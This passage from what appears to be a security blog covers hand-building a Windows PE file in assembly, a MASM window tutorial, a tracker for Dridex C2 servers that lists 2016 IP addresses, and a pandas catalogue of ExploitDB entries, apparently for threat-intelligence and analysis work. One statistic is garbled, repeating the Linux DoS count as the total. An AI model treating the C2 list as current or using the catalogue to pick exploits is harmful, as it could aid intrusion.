; 2. LUEVELSMEYER’s description about PE file format
; 3. Microsoft PSDK July 2000 Edition
; 4. Iczelion’s PE Tutorial
IMAGE_DOS_HEADER:                               ;start : 00 (0) to 3F (63)
        .e_magic        dw      0x5A4D          ;00 01
        .e_cblp         dw      0x0080          ;02 03
        .e_cp           dw      0x0001          ;04 05
        .e_crlc         dw      0x0000          ;06 07
        .e_cparhdr      dw      0x0004          ;08 09
        .e_minalloc     dw      0x0010          ;10 11
        .e_maxalloc     dw      0xFFFF          ;12 13
        .e_ss           dw      0x0000          ;14 15
        .e_sp           dw      0x0140          ;16 17
        .e_csum         dw      0x0000          ;18 19
        .e_ip           dw      0x0000          ;20 21
        .e_cs           dw      0x0000          ;22 23
        .e_lfarlc       dw      0x0040          ;24 25
        .e_ovno         dw      0x0000          ;26 27
        .e_res          rw      4               ;28 29 | 30 31 | 32 33 | 34 35
        .e_oemid        dw      0x0000          ;36 37
        .e_oeminfo      dw      0x0000          ;38 39
        .e_res2         rw      10              ;40 41 | 42 43 | 44 45 | 46 47 | 48 49 | 50 51
        .e_lfanew       dd      0x00000080      ;52 53 | 54 55 | 56 57 | 58 59
                                                ;60 61 62 63
;=====================================================================================================
DOS_STUB:                               ;start : 40 (64) to 7F (127)
        use16                           ;DOS-STUB is a 16-bit program
                                        ;push   cs <- we save 1 byte here
                                        ;pop    ds <- we save another 1 byte here
                                        ;our DS is less 100h from CS, DS received PSP address
        mov     dx,0x100 + 0x0B         ;our db message starts at 0x0B because we save 3 bytes already
        mov     ah,0x9
        int     0x21
        mov     ah,0x4C                 ;save 1 byte here because we need to use AH only for function
        int     0x21
        
        db      'This program cannot be run in DOS mode.',13,10,'$'
        rb      0x80 - $                ;0x80 - 0x75 = rb 0xB
;=====================================================================================================
IMAGE_NT_HEADERS:                                       ;start : 80 (128) to 1EF (495)
        .Signature                              db      'PE',0,0                ;128 131
        
        IMAGE_FILE_HEADER:                              ;start : 84 (132) to 97 (151)
                .Machine                        dw      0x014C                  ;132 133 for intel 386
                .NumberOfSection                dw      0x0003                  ;134 135
                .TimeDateStamp                  dd      %t                      ;136 139
                .PointerToSymbolTable           dd      0                       ;140 143
                .NumberOfSymbols                dd      0                       ;144 147
                .SizeOfOptionalHeader           dw      0x00E0                  ;148 149
                .Characteristic                 dw      0x818F                  ;150 151
        
        IMAGE_OPTIONAL_HEADER:                  ;start  : 98 (152) to F7 (247) * till IMAGE_DATA_DIRECTORY
                                                                                ;offset
                .Magic                                  dw      0x010B          ;152 153
                .MajorLinkerVersion                     db      0x01            ;154
                .MinorLinkerVersion                     db      0x37            ;155
                .SizeOfCode                             dd      0               ;156 159
                .SizeOfInitializedData                  dd      0               ;160 163
                .SizeOfUninitializedData                dd      0               ;164 167
                .AddressOfEntryPoint                    dd      0x2000          ;168 171 = base + 2000 = 402000 (.code section)
                .BaseOfCode                             dd      0               ;172 175
                .BaseOfData                             dd      0               ;176 179
                .ImageBase                              dd      0x00400000      ;180 183 (default)
                .SectionAlignment                       dd      0x00001000      ;184 187 4096 bytes
                .FileAlignment                          dd      0x00000200      ;188 191 512 bytes (default)
                .MajorOperatingSystemVersion            dw      1               ;192 193
                .MinorOperatingSystemVersion            dw      0               ;194 195
                .MajorImageVersion                      dw      0               ;196 197
                .MinorImageVersion                      dw      0               ;198 199
                .MajorSubsystemVersion                  dw      4               ;200 201
                .MinorSubsystemVersion                  dw      0               ;202 203
                .Win32VersionValue                      dd      0               ;204 207
                .SizeOfImage                            dd      0x00004000      ;208 211
                .SizeOfHeaders                          dd      0x00000200      ;212 215
                .CheckSum                               dd      0x0000EF20      ;216 219
                .Subsystem                              dw      2               ;220 221 IMAGE_SUBSYSTEM_WINDOWS_GUI
                .DllCharacteristics                     dw      0               ;222 223
                .SizeOfStackReserve                     dd      0x00001000      ;224 227 4096 bytes
                .SizeOfStackCommit                      dd      0x00001000      ;228 231 4096 bytes
                .SizeOfHeapReserve                      dd      0x00100000      ;232 235 1048576 bytes
                .SizeOfHeapCommit                       dd      0               ;236 239
                .LoaderFlags                            dd      0               ;240 243
                .NumberOfRvaAndSizes                    dd      0x10            ;244 247 16 decimal
                
                IMAGE_DATA_DIRECTORY:           ;start : F8 (248) to 177 (375) * till IMAGE_SECTION_TABLE
                                                        rq      1                ;248 255
                        .ImportTableVA                  dd      0x00003000       ;256 263
                        .ImportTableSize                dd      0x00000090
                                                        rq      14               ;we don't need them either     ;263 + 112 = 375
                IMAGE_SECTION_TABLE:            ;start : 178 (376) to 1EF (495)
                        SECTION_1:
                                .Name                   dq      '.data' ;start : 178 (376)
                                .VirtualSize            dd      0x0000001D
                                .VirtualAddress         dd      0x00001000      ;-> in memory, it is 401000
                                .SizeOfRawData          dd      0x00000200 
                                .PointerToRawData       dd      0x00000200      ;-> in our file, it is 0x200 (512) (offset from zero)
                                .PointerToRelocations   dd      0
                                .PointerToLineNumbers   dd      0
                                .NumberOfRelocations    dw      0
                                .NumberOfLineNumbers    dw      0
                                .Characteristic         dd      0xC0000040      ;end   : 19F (415)
                        SECTION_2:
                                .Name                   dq      '.code' ;start : 1A0 (416)
                                .VirtualSize            dd      0x0000001C
                                .VirtualAddress         dd      0x00002000      ;-> in memory, it is 402000
                                .SizeOfRawData          dd      0x00000200
                                .PointerToRawData       dd      0x00000400      ;-> in our file, it is 0x400 (1024) (offset from zero)
                                .PointerToRelocations   dd      0
                                .PointerToLineNumbers   dd      0
                                .NumberOfRelocations    dw      0
                                .NumberOfLineNumbers    dw      0
                                .Characteristic         dd      0x60000020      ;end   : 1C7 (455)
                        SECTION_3:
                                .Name                   dq      '.idata'        ;start : 1C8 (456)
                                .VirtualSize            dd      0x00000090
                                .VirtualAddress         dd      0x00003000      ;-> in memory, it is 403000
                                .SizeOfRawData          dd      0x00000200
                                .PointerToRawData       dd      0x00000600      ;-> in our file, it is 0x600 (1536) (offset from zero)
                                .PointerToRelocations   dd      0
                                .PointerToLineNumbers   dd      0
                                .NumberOfRelocations    dw      0
                                .NumberOfLineNumbers    dw      0
                                .Characteristic         dd      0x40000040      ;end   : 1EF (495)
;our SECTION_1 raw data starts at 0x200 (512) bytes from zero,
;and the section table ends at file offset 1EF;
;we need "rb 0x10" or "rq 2" so that file offsets 1F0 to 1FF are filled.
                                                        rq      2               ;start : 1F0 (496) to 1FF (511)
                        
                        ;file offset   = 0x200
                        ;memory offset = 0x401000 = (IMAGE_OPTIONAL_HEADER.ImageBase) + (SECTION_1.VirtualAddress)
                        ;=========================================================================================
                        SECTION_1_RAW_DATA:                                     ;start : 200 (512) to 3FF (1023)
                        org 0x401000
                                msgText         db      'Message Text',0        ;512 524
                                                                                ;we use 1D (29) bytes here
                                msgCaption      db      'Message Caption',0     ;525 540
                                
                                ; 541 to 1023 should be filled
                                ; (1023 - 541) + 1 = 483 bytes
                                
                                ; we NEED to + 1 because 1023 is not INCLUDED when
                                ; we use it to minus 541.
                                rb      483                                     ;because our .code raw data start at 400 (1024)
                                                                                ;and because our IMAGE_OPTIONAL_HEADER > FileAlignment is 0x200 (512) bytes
                        ;file offset   = 0x400
                        ;memory offset = 0x402000 = (IMAGE_OPTIONAL_HEADER.ImageBase) + (SECTION_2.VirtualAddress)
                        ;=========================================================================================
                        org 0x2000
                        SECTION_2_RAW_DATA:                                                     ;start : 400 (1024) to 5FF (1535)
                                use32                                                           ;we are using 32-bit instruction
                                push    0x40                    ;6A 40                          ;MB_OK + MB_ICONASTERISK + MB_APPLMODAL
                                push    msgCaption              ;68 0D 10 40 00                 ;push msgCaption
                                push    msgText                 ;68 00 10 40 00                 ;push msgText
                                push    0                       ;6A 00                          ;push HWND_DESKTOP
                                call    dword [0x0040307A]      ;FF 15 7A 30 40 00              ;call MessageBoxA
                                push    0                       ;6A 00                          ;push zero for ExitProcess parameter
                                call    dword [0x0040305C]      ;FF 15 5C 30 40 00              ;call ExitProcess
                                
                                ;we have used 1C (28) bytes here
                                ;1052 to 1535 should be filled
                                ;(1535 - 1052) + 1 = 484 bytes
                                rb      484
                        ;file offset   = 0x600
                        ;memory offset = 0x403000 = (IMAGE_OPTIONAL_HEADER.ImageBase) + (SECTION_3.VirtualAddress)
                        ;=========================================================================================
                        org 0x3000
                        SECTION_3_RAW_DATA:                                             ;start : 600 (1536) to 7FF (2047)
                                IMAGE_IMPORT_DESCRIPTOR_1:
                                        .OriginalFirstThunk     dd      0x00003054      ;3000 3003
                                        .TimeDateStamp  dd      0                       ;3004 3007
                                        .ForwarderChain dd      0                       ;3008 300B
                                        .Name                   dd      0x0000303C      ;300C 300F
                                        .FirstThunk             dd      0x0000305C      ;3010 3013
                                IMAGE_IMPORT_DESCRIPTOR_2:
                                        .OriginalFirstThunk     dd      0x00003072      ;3014 3017
                                        .TimeDateStamp          dd      0               ;3018 301B
                                        .ForwarderChain         dd      0               ;301C 301F
                                        .Name                   dd      0x00003049      ;3020 3023
                                        .FirstThunk             dd      0x0000307A      ;3024 3027
                                
                                                ;terminated with an IMAGE_IMPORT_DESCRIPTOR filled with zeros
                                rd      5       ;the structure size of IMAGE_IMPORT_DESCRIPTOR
                                                                                        ;3028 to 303B
                                
                        ;Our DLL Name
                        .KERNEL32       db      'KERNEL32.DLL',0                        ;303C to 3048
                        .USER32         db      'USER32.DLL',0                          ;3049 to 3053
                        IMAGE_THUNK_DATA32_1:
                                .ForwarderString        dd      0x00003064              ;3054 3057
                                .Function               dd      0                       ;3058 305B
                                .Ordinal                dd      0x00003064              ;305C 305F
                                .AddressOfData          dd      0                       ;3060 3063
                                IMAGE_IMPORT_BY_NAME_1:
                                        .Hint           dw      0                       ;3064 3065
                                        .Name           db      'ExitProcess',0         ;3066 3071
                        IMAGE_THUNK_DATA32_2:
                                .ForwarderString        dd      0x00003082              ;3072 3075
                                .Function               dd      0                       ;3076 3079
                                .Ordinal                dd      0x00003082              ;307A 307D
                                .AddressOfData          dd      0                       ;307E 3081
                                IMAGE_IMPORT_BY_NAME_2:
                                        .Hint           dw      0                       ;3082 3083
                                        .Name           db      'MessageBoxA',0         ;3084 308F
                        ;308F = 143 bytes used
                        ;must fill 2047 - (1536 + 143) = 368 + 1 = 369 bytes
                        rb 367
                        db 0
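The import table that SECTION_3 builds by hand, walked by a small parser. This is an added example, not part of the original listing: it packs SECTION_3 from the values above with Python's struct module and then resolves each descriptor and thunk the way the Windows loader (or a PE parser in an analysis toolkit) does. The image base 0x00400000 and the section RVA 0x3000 are taken from the listing's comments; the function and constant names are mine.

```python
"""Walk the hand-built import table of SECTION_3 from the listing above.

Rebuilds the 512-byte raw data of SECTION_3 with struct.pack, then parses it
descriptor by descriptor: Name -> DLL string, OriginalFirstThunk -> Import Name
Table -> IMAGE_IMPORT_BY_NAME, FirstThunk -> the IAT slot whose virtual address
the `call dword [...]` instructions in SECTION_2 read from.
"""
import struct

IMAGE_BASE = 0x00400000      # IMAGE_OPTIONAL_HEADER.ImageBase assumed by the listing
SECTION3_RVA = 0x3000        # SECTION_3.VirtualAddress
SECTION3_SIZE = 0x200        # one FileAlignment unit (0x200 bytes)


def build_section3():
    """Pack SECTION_3 exactly as the listing lays it out (offsets are RVA - 0x3000)."""
    buf = bytearray(SECTION3_SIZE)
    # IMAGE_IMPORT_DESCRIPTOR_1 (RVA 3000): OriginalFirstThunk, TimeDateStamp,
    # ForwarderChain, Name, FirstThunk for KERNEL32.DLL
    struct.pack_into("<IIIII", buf, 0x000, 0x3054, 0, 0, 0x303C, 0x305C)
    # IMAGE_IMPORT_DESCRIPTOR_2 (RVA 3014) for USER32.DLL
    struct.pack_into("<IIIII", buf, 0x014, 0x3072, 0, 0, 0x3049, 0x307A)
    # RVA 3028..303B: the all-zero terminating descriptor (bytearray is already zero)
    buf[0x03C:0x049] = b"KERNEL32.DLL\0"                 # 303C..3048
    buf[0x049:0x054] = b"USER32.DLL\0"                   # 3049..3053
    # KERNEL32: Import Name Table at 3054 and IAT at 305C, both [3064, 0]
    struct.pack_into("<II", buf, 0x054, 0x3064, 0)
    struct.pack_into("<II", buf, 0x05C, 0x3064, 0)
    struct.pack_into("<H", buf, 0x064, 0)                # IMAGE_IMPORT_BY_NAME.Hint
    buf[0x066:0x072] = b"ExitProcess\0"                  # 3066..3071
    # USER32: Import Name Table at 3072 and IAT at 307A, both [3082, 0]
    struct.pack_into("<II", buf, 0x072, 0x3082, 0)
    struct.pack_into("<II", buf, 0x07A, 0x3082, 0)
    struct.pack_into("<H", buf, 0x082, 0)
    buf[0x084:0x090] = b"MessageBoxA\0"                  # 3084..308F
    return bytes(buf)


def _cstring(data, off):
    """NUL-terminated ASCII string starting at offset off."""
    return data[off:data.index(b"\0", off)].decode("ascii")


def parse_imports(section, section_rva=SECTION3_RVA, image_base=IMAGE_BASE):
    """Return {dll_name: [(function_name, iat_virtual_address), ...]}."""
    def rva_to_off(rva):
        off = rva - section_rva
        if not 0 <= off < len(section):
            raise ValueError("RVA %#x does not fall inside the section" % rva)
        return off

    imports = {}
    desc_off = 0
    while desc_off + 20 <= len(section):
        oft, _stamp, _fwd, name_rva, ft = struct.unpack_from("<IIIII", section, desc_off)
        if oft == 0 and name_rva == 0 and ft == 0:
            break                                         # all-zero terminator
        dll = _cstring(section, rva_to_off(name_rva))
        entries = []
        int_off, iat_rva = rva_to_off(oft), ft
        while True:
            thunk, = struct.unpack_from("<I", section, int_off)
            if thunk == 0:
                break                                     # end of this DLL's thunk array
            if thunk & 0x80000000:                        # IMAGE_ORDINAL_FLAG32: import by ordinal
                name = "#%d" % (thunk & 0xFFFF)
            else:                                         # skip the 2-byte Hint of IMAGE_IMPORT_BY_NAME
                name = _cstring(section, rva_to_off(thunk) + 2)
            entries.append((name, image_base + iat_rva))  # where the loader writes the resolved address
            int_off += 4
            iat_rva += 4
        imports[dll] = entries
        desc_off += 20                                    # sizeof(IMAGE_IMPORT_DESCRIPTOR)
    return imports


if __name__ == "__main__":
    for dll, funcs in parse_imports(build_section3()).items():
        for name, va in funcs:
            print("%-13s %-12s IAT slot %#010x" % (dll, name, va))
```

The two IAT slot addresses the parser reports are exactly the operands of `call dword [0x0040305C]` (ExitProcess) and `call dword [0x0040307A]` (MessageBoxA) in SECTION_2, which is the check an analyst makes when deciding whether a hand-crafted import table is consistent with the code that uses it.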

Let’s Learn: Assembly -> Simple Window

Source: https://win32assembly.programminghorizon.com/tut3.html

Theory:

Windows programs rely heavily on API functions for their GUI. This approach benefits both users and programmers. Users don’t have to learn how to navigate the GUI of each new program, because the GUIs of Windows programs are alike. For programmers, the GUI code is already there, tested, and ready for use. The downside for programmers is the increased complexity involved: in order to create or manipulate any GUI object such as a window, menu or icon, programmers must follow a strict recipe. That can be overcome by modular programming or the OOP paradigm.

I’ll outline the steps required to create a window on the desktop below:

  1. Get the instance handle of your program (required)
  2. Get the command line (not required unless your program wants to process a command line)
  3. Register window class (required, unless you use predefined window types, e.g. MessageBox or a dialog box)
  4. Create the window (required)
  5. Show the window on the desktop (required unless you don’t want to show the window immediately)
  6. Refresh the client area of the window
  7. Enter an infinite loop, checking for messages from Windows
  8. If messages arrive, they are processed by a specialized function that is responsible for the window
  9. Quit program if the user closes the window
===============================================================
.386 
.model flat,stdcall 
option casemap:none 
include \masm32\include\windows.inc 
include \masm32\include\user32.inc 
includelib \masm32\lib\user32.lib            ; calls to functions in user32.lib and kernel32.lib 
include \masm32\include\kernel32.inc 
includelib \masm32\lib\kernel32.lib
WinMain proto :DWORD,:DWORD,:DWORD,:DWORD

.DATA                     ; initialized data 
ClassName   db "SimpleWinClass",0        ; the name of our window class 
AppName     db "Our First Window",0        ; the name of our window

.DATA?                    ; Uninitialized data 
hInstance HINSTANCE ?     ; Instance handle of our program 
CommandLine LPSTR   ? 

.CODE                                   ; Here begins our code 
start: 
invoke GetModuleHandle, NULL            ; get the instance handle of our program. 
                                        ; Under Win32, hmodule==hinstance 
mov hInstance,eax 
invoke GetCommandLine                   ; get the command line. You don’t have to call this function IF 
                                        ; your program doesn’t process the command line. 
mov CommandLine,eax 
invoke WinMain, hInstance,NULL,CommandLine, SW_SHOWDEFAULT        ; call the main function 
invoke ExitProcess, eax                                           ; quit our program. The exit code is returned in eax from WinMain.

WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD 
    LOCAL wc:WNDCLASSEX                                            ; create local variables on stack 
    LOCAL msg:MSG 
    LOCAL hwnd:HWND

    mov   wc.cbSize,SIZEOF WNDCLASSEX                   ; fill values in members of wc 
    mov   wc.style, CS_HREDRAW or CS_VREDRAW 
    mov   wc.lpfnWndProc, OFFSET WndProc 
    mov   wc.cbClsExtra,NULL 
    mov   wc.cbWndExtra,NULL 
    push  hInstance 
    pop   wc.hInstance 
    mov   wc.hbrBackground,COLOR_WINDOW+1 
    mov   wc.lpszMenuName,NULL 
    mov   wc.lpszClassName,OFFSET ClassName 
    invoke LoadIcon,NULL,IDI_APPLICATION 
    mov   wc.hIcon,eax 
    mov   wc.hIconSm,eax 
    invoke LoadCursor,NULL,IDC_ARROW 
    mov   wc.hCursor,eax 
    invoke RegisterClassEx, addr wc                       ; register our window class 
    invoke CreateWindowEx,NULL,\ 
                ADDR ClassName,\ 
                ADDR AppName,\ 
                WS_OVERLAPPEDWINDOW,\ 
                CW_USEDEFAULT,\ 
                CW_USEDEFAULT,\ 
                CW_USEDEFAULT,\ 
                CW_USEDEFAULT,\ 
                NULL,\ 
                NULL,\ 
                hInst,\ 
                NULL 
    mov   hwnd,eax 
    invoke ShowWindow, hwnd,CmdShow                         ; display our window on desktop 
    invoke UpdateWindow, hwnd                               ; refresh the client area

    .WHILE TRUE                                             ; Enter message loop 
                invoke GetMessage, ADDR msg,NULL,0,0 
                .BREAK .IF (!eax) 
                invoke TranslateMessage, ADDR msg 
                invoke DispatchMessage, ADDR msg 
   .ENDW 
    mov     eax,msg.wParam                                   ; return exit code in eax 
    ret 
WinMain endp

WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM 
    .IF uMsg==WM_DESTROY                                    ; if the user closes our window 
        invoke PostQuitMessage,NULL             ; quit our application 
    .ELSE 
        invoke DefWindowProc,hWnd,uMsg,wParam,lParam     ; Default message processing 
        ret 
    .ENDIF 
    xor eax,eax 
    ret 
WndProc endp

end start
===============================================================

Dridex Node Tracker

Author: Vitali Kremez
Goal: Track all Dridex nodes and ingest the data into Elasticsearch, Kibana, Logstash (ELK) instance
Source: https://feodotracker.abuse.ch/

Steps:
(1) Obtain the feed data using the custom scraper “dridexloader.py”;
(2) Load the data to the MySQL database;
(3) Push the data to Elasticsearch;
(4) Create custom dashboards for the data visualization

The most recent Dridex nodes from the malware feeds are as follows:

Time C2 malware
November 18th 2016; 13:35:55.000 188.126.72.179 Dridex
November 18th 2016; 05:55:13.000 174.37.216.226 Dridex
November 18th 2016; 05:55:13.000 166.78.144.68 Dridex
November 16th 2016; 13:54:38.000 54.235.86.173 Dridex
November 15th 2016; 09:53:22.000 193.136.97.4 Dridex
November 15th 2016; 09:53:22.000 93.122.165.54 Dridex
November 11th 2016; 09:09:04.000 149.210.158.54 Dridex
November 11th 2016; 09:09:04.000 87.254.45.29 Dridex
October 27th 2016; 06:19:59.000 210.2.86.72 Dridex
October 27th 2016; 06:19:59.000 162.243.47.192 Dridex
October 26th 2016; 07:06:32.000 46.101.10.156 Dridex
October 26th 2016; 07:06:32.000 120.138.18.110 Dridex
October 26th 2016; 07:06:32.000 198.20.239.21 Dridex
October 23rd 2016; 20:07:38.000 92.222.219.26 Dridex
September 29th 2016; 08:09:00.000 23.253.210.81 Dridex
September 27th 2016; 05:46:30.000 62.108.36.240 Dridex
September 27th 2016; 05:46:30.000 132.248.49.100 Dridex
September 27th 2016; 05:46:30.000 148.251.46.169 Dridex
September 15th 2016; 02:14:31.000 50.57.75.172 Dridex
September 15th 2016; 02:14:31.000 130.88.149.87 Dridex
September 6th 2016; 13:00:07.000 109.104.92.167 Dridex
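Steps (1) and (3) of the workflow as an added example; this is not the author's dridexloader.py. It parses feed rows in the shape of the table above (the sample rows below are constructed copies of it, with one duplicate and one junk line added to exercise the checks) and turns them into an Elasticsearch _bulk body. The index name dridex-nodes, the field names and the assumption of an Elasticsearch version without mapping types are mine.

```python
import ipaddress
import json
import re
from datetime import datetime

# Constructed sample in the shape of the feed table above (Time, C2, malware).
# Line 3 duplicates line 2 and line 5 carries a non-IP C2 value on purpose.
SAMPLE_FEED = """\
November 18th 2016; 13:35:55.000 188.126.72.179 Dridex
November 18th 2016; 05:55:13.000 174.37.216.226 Dridex
November 18th 2016; 05:55:13.000 174.37.216.226 Dridex
October 23rd 2016; 20:07:38.000 92.222.219.26 Dridex
September 6th 2016; 13:00:07.000 not-an-ip Dridex
"""

ROW_RE = re.compile(
    r"^(?P<time>[A-Z][a-z]+ \d{1,2}(?:st|nd|rd|th) \d{4}; \d{2}:\d{2}:\d{2}(?:\.\d+)?)\s+"
    r"(?P<c2>\S+)\s+(?P<malware>\S+)$"
)


def parse_time(text):
    """'November 18th 2016; 13:35:55.000' -> datetime (ordinal suffix stripped)."""
    text = re.sub(r"(\d+)(st|nd|rd|th)", r"\1", text)
    if "." not in text:                      # tolerate rows without a fraction
        text += ".000"
    return datetime.strptime(text, "%B %d %Y; %H:%M:%S.%f")


def parse_row(line):
    """One feed row -> document dict, or None if the row is malformed."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    try:
        ip = ipaddress.ip_address(m.group("c2"))   # reject junk before it reaches the index
    except ValueError:
        return None
    return {
        "@timestamp": parse_time(m.group("time")).strftime("%Y-%m-%dT%H:%M:%S"),
        "c2": str(ip),
        "malware": m.group("malware"),
        "source": "feodotracker",
    }


def parse_feed(text):
    """All valid rows, de-duplicated on (timestamp, C2) so re-pulls do not inflate counts."""
    seen, rows = set(), []
    for line in text.splitlines():
        rec = parse_row(line)
        if rec is None:
            continue
        key = (rec["@timestamp"], rec["c2"])
        if key in seen:
            continue
        seen.add(key)
        rows.append(rec)
    return rows


def to_bulk(rows, index="dridex-nodes"):
    """Elasticsearch _bulk body: one action line plus one document line per record.
    The document _id is derived from C2 + timestamp, so re-running the loader is idempotent."""
    lines = []
    for rec in rows:
        doc_id = "%s_%s" % (rec["c2"], rec["@timestamp"])
        lines.append(json.dumps({"index": {"_index": index, "_id": doc_id}}))
        lines.append(json.dumps(rec, sort_keys=True))
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print(to_bulk(parse_feed(SAMPLE_FEED)), end="")
```

The body returned by to_bulk is what gets POSTed to the cluster's /_bulk endpoint with Content-Type application/x-ndjson; the deterministic _id is what makes the MySQL staging step in the workflow optional for de-duplication.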

Exploit SQL Database Workflow with Pandas and iPython

Author:  Vitali Kremez

  • This iPython notebook creates and explores a SQL database of all known public exploits.

Source:

  • pandas: A library with data structures and data analysis tools. 
  • IPython notebook: An interface for writing and sharing Python code, text, and plots.
  • SQLite: A self-contained, serverless database that’s easy to set up and query from pandas.
  • Plotly: A platform for publishing interactive graphs from Python to the web.



PHP has the largest number of exploits in the SQL database.

Function:

(1) Creates and queries the SQL database with approx. 40,000 rows and 9 columns of public exploits;

(2) Creates a graph “Number of remote exploits by platform”;
[1] Windows OS has 3,340 remote exploits, the largest number of remote exploits in the SQL database.
[2] Linux OS has 825 remote exploits, the second largest number in the database.

(3) Creates a graph “Number of webapps exploits by platform”;
[1] We have approx. 17,335 PHP webapp exploits, the largest number of webapp exploits in the SQL database.
[2] We have only 1,498 ASP webapp exploits, the second largest number in the database.

(4) Creates a graph “Number of local exploits by platform”;
[1] We have 1,561 local Windows exploits, the largest number of local exploits in the SQL database.
[2] We have only 819 local Linux exploits, the second largest number in the database.

(5) Creates a graph “Number of Denial-of-Service (DOS) exploits by platform”;
[1] We have 2,845 Windows DOS exploits, the largest number of DOS exploits in the SQL database.
[2] We have only 603 Linux DOS exploits, the second largest number in the database.

(6) Creates a graph “Number of exploits by platform”;
[1] We have approx. 17,590 PHP exploits, the largest number of exploits in the SQL database.
[2] We have only 603 Linux exploits, the second largest number in the database.

(7) Queries the SQL database for Windows exploits;
We have 7,921 Windows exploits in the database.

(8) Creates a graph “Number of exploits by date”;
We have the largest number of exploits developed in 2010 among other years.

Windows has the largest number of DOS exploits among other platforms.



In [39]:
import pandas as pd
from sqlalchemy import create_engine # database connection
import datetime as dt
from IPython.display import display
In [40]:
import plotly.plotly as py # interactive graphing
from plotly.graph_objs import Bar, Scatter, Marker, Layout
In [13]:
disk_engine = create_engine('sqlite:///ExploitDB.db') 
In [14]:
start = dt.datetime.now()
chunksize = 40000
j = 0
index_start = 1
In [15]:
for df in pd.read_csv('https://raw.githubusercontent.com/offensive-security/exploit-database/master/files.csv', chunksize=chunksize, iterator=True, encoding='utf-8'):
    df.index += index_start
    j += 1
    print '{} seconds: completed {} rows'.format((dt.datetime.now() - start).seconds, j*chunksize)
    df.to_sql('data', disk_engine, if_exists='append')
    index_start = df.index[-1] + 1
4 seconds: completed 40000 rows
In [42]:
df = pd.read_sql_query('SELECT * FROM data', disk_engine)
print df
       index     id                                  file  \
0 1 1 platforms/windows/remote/1.c
1 2 2 platforms/windows/remote/2.c
2 3 3 platforms/linux/local/3.c
3 4 4 platforms/solaris/local/4.c
4 5 5 platforms/windows/remote/5.c
5 6 6 platforms/php/webapps/6.php
6 7 7 platforms/linux/remote/7.pl
7 8 8 platforms/linux/remote/8.c
8 9 9 platforms/windows/dos/9.c
9 10 10 platforms/linux/remote/10.c
10 11 37060 platforms/windows/dos/37060.html
11 12 11 platforms/linux/dos/11.c
12 13 12 platforms/linux/local/12.c
13 14 13 platforms/windows/dos/13.c
14 15 15 platforms/osx/local/15.c
15 16 16 platforms/linux/remote/16.c
16 17 17 platforms/windows/dos/17.pl
17 18 18 platforms/linux/remote/18.sh
18 19 19 platforms/linux/remote/19.c
19 20 20 platforms/windows/remote/20.txt
20 21 21 platforms/linux/local/21.c
21 22 22 platforms/windows/dos/22.c
22 23 23 platforms/windows/remote/23.c
23 24 24 platforms/linux/remote/24.c
24 25 25 platforms/linux/remote/25.c
25 26 26 platforms/linux/remote/26.sh
26 27 27 platforms/linux/remote/27.pl
27 28 28 platforms/windows/remote/28.c
28 29 29 platforms/bsd/local/29.c
29 30 30 platforms/windows/remote/30.pl
... ... ... ...
35465 35466 39213 platforms/php/webapps/39213.txt
35466 35467 39214 platforms/linux/local/39214.c
35467 35468 39215 platforms/windows/remote/39215.py
35468 35469 39216 platforms/windows/dos/39216.py
35469 35470 39217 platforms/linux/local/39217.c
35470 35471 39218 platforms/windows/remote/39218.html
35471 35472 39219 platforms/multiple/dos/39219.txt
35472 35473 39220 platforms/windows/dos/39220.txt
35473 35474 39221 platforms/win64/dos/39221.txt
35474 35475 39222 platforms/multiple/remote/39222.txt
35475 35476 39223 platforms/php/webapps/39223.txt
35476 35477 39224 platforms/hardware/remote/39224.py
35477 35478 39229 platforms/linux/dos/39229.cpp
35478 35479 39230 platforms/linux/local/39230.c
35479 35480 39231 platforms/asp/webapps/39231.py
35480 35481 39232 platforms/windows/dos/39232.txt
35481 35482 39233 platforms/windows/dos/39233.txt
35482 35483 39234 platforms/php/webapps/39234.py
35483 35484 39235 platforms/multiple/webapps/39235.txt
35484 35485 39236 platforms/multiple/webapps/39236.py
35485 35486 39237 platforms/php/webapps/39237.txt
35486 35487 39238 platforms/php/webapps/39238.txt
35487 35488 39239 platforms/php/webapps/39239.txt
35488 35489 39240 platforms/php/webapps/39240.txt
35489 35490 39242 platforms/windows/dos/39242.py
35490 35491 39243 platforms/php/webapps/39243.txt
35491 35492 39244 platforms/linux/local/39244.txt
35492 35493 39245 platforms/php/webapps/39245.txt
35493 35494 39246 platforms/php/webapps/39246.txt
35494 35495 39248 platforms/php/webapps/39248.txt

description date \
0 Microsoft Windows WebDAV - (ntdll.dll) Remote ... 2003-03-23
1 Microsoft Windows WebDAV - Remote PoC Exploit 2003-03-24
2 Linux Kernel 2.2.x - 2.4.x ptrace/kmod Local R... 2003-03-30
3 Sun SUNWlldap Library Hostname - Buffer Overfl... 2003-04-01
4 Microsoft Windows RPC Locator Service - Remote... 2003-04-03
5 WordPress <= 2.0.2 - (cache) Remote Shell Inje... 2006-05-25
6 Samba 2.2.x - Remote Root Buffer Overflow Exploit 2003-04-07
7 SETI@home Clients - Buffer Overflow Exploit 2003-04-08
8 Apache HTTP Server 2.x Memory Leak Exploit 2003-04-09
9 Samba <= 2.2.8 - Remote Root Exploit 2003-04-10
10 Microsoft Internet Explorer 11 - Crash PoC 2015-05-19
11 Apache <= 2.0.44 (Linux) - Remote Denial of Se... 2003-04-11
12 Linux Kernel < 2.4.20 - Module Loader Local Ro... 2003-04-14
13 Chindi Server 1.0 - Denial of Service Exploit 2003-04-18
14 Mac OS X <= 10.2.4 DirectoryService (PATH) Loc... 2003-04-18
15 PoPToP PPTP <= 1.1.4-b3 - Remote Root Exploit 2003-04-18
16 Xeneo Web Server 2.2.9.0 - Denial of Service E... 2003-04-22
17 Snort <= 1.9.1 - Remote Root Exploit (p7snort1... 2003-04-23
18 PoPToP PPTP <= 1.1.4-b3 - Remote Root Exploit ... 2003-04-25
19 Microsoft Windows SMB - Authentication Remote ... 2003-04-25
20 Qpopper 4.0.x - poppassd Local Root Exploit 2003-04-29
21 Pi3Web 2.0.1 - Denial of Service - Proof of Co... 2003-04-29
22 Real Server < 8.0.2 - Remote Exploit (Windows ... 2003-04-30
23 Sendmail <= 8.12.8 prescan() BSD Remote Root E... 2003-04-30
24 OpenSSH/PAM <= 3.6.1p1 - Remote Users Discover... 2003-04-30
25 OpenSSH/PAM <= 3.6.1p1 - Remote Users Ident (g... 2003-05-02
26 CommuniGate Pro Webmail 4.0.6 Session Hijackin... 2003-05-05
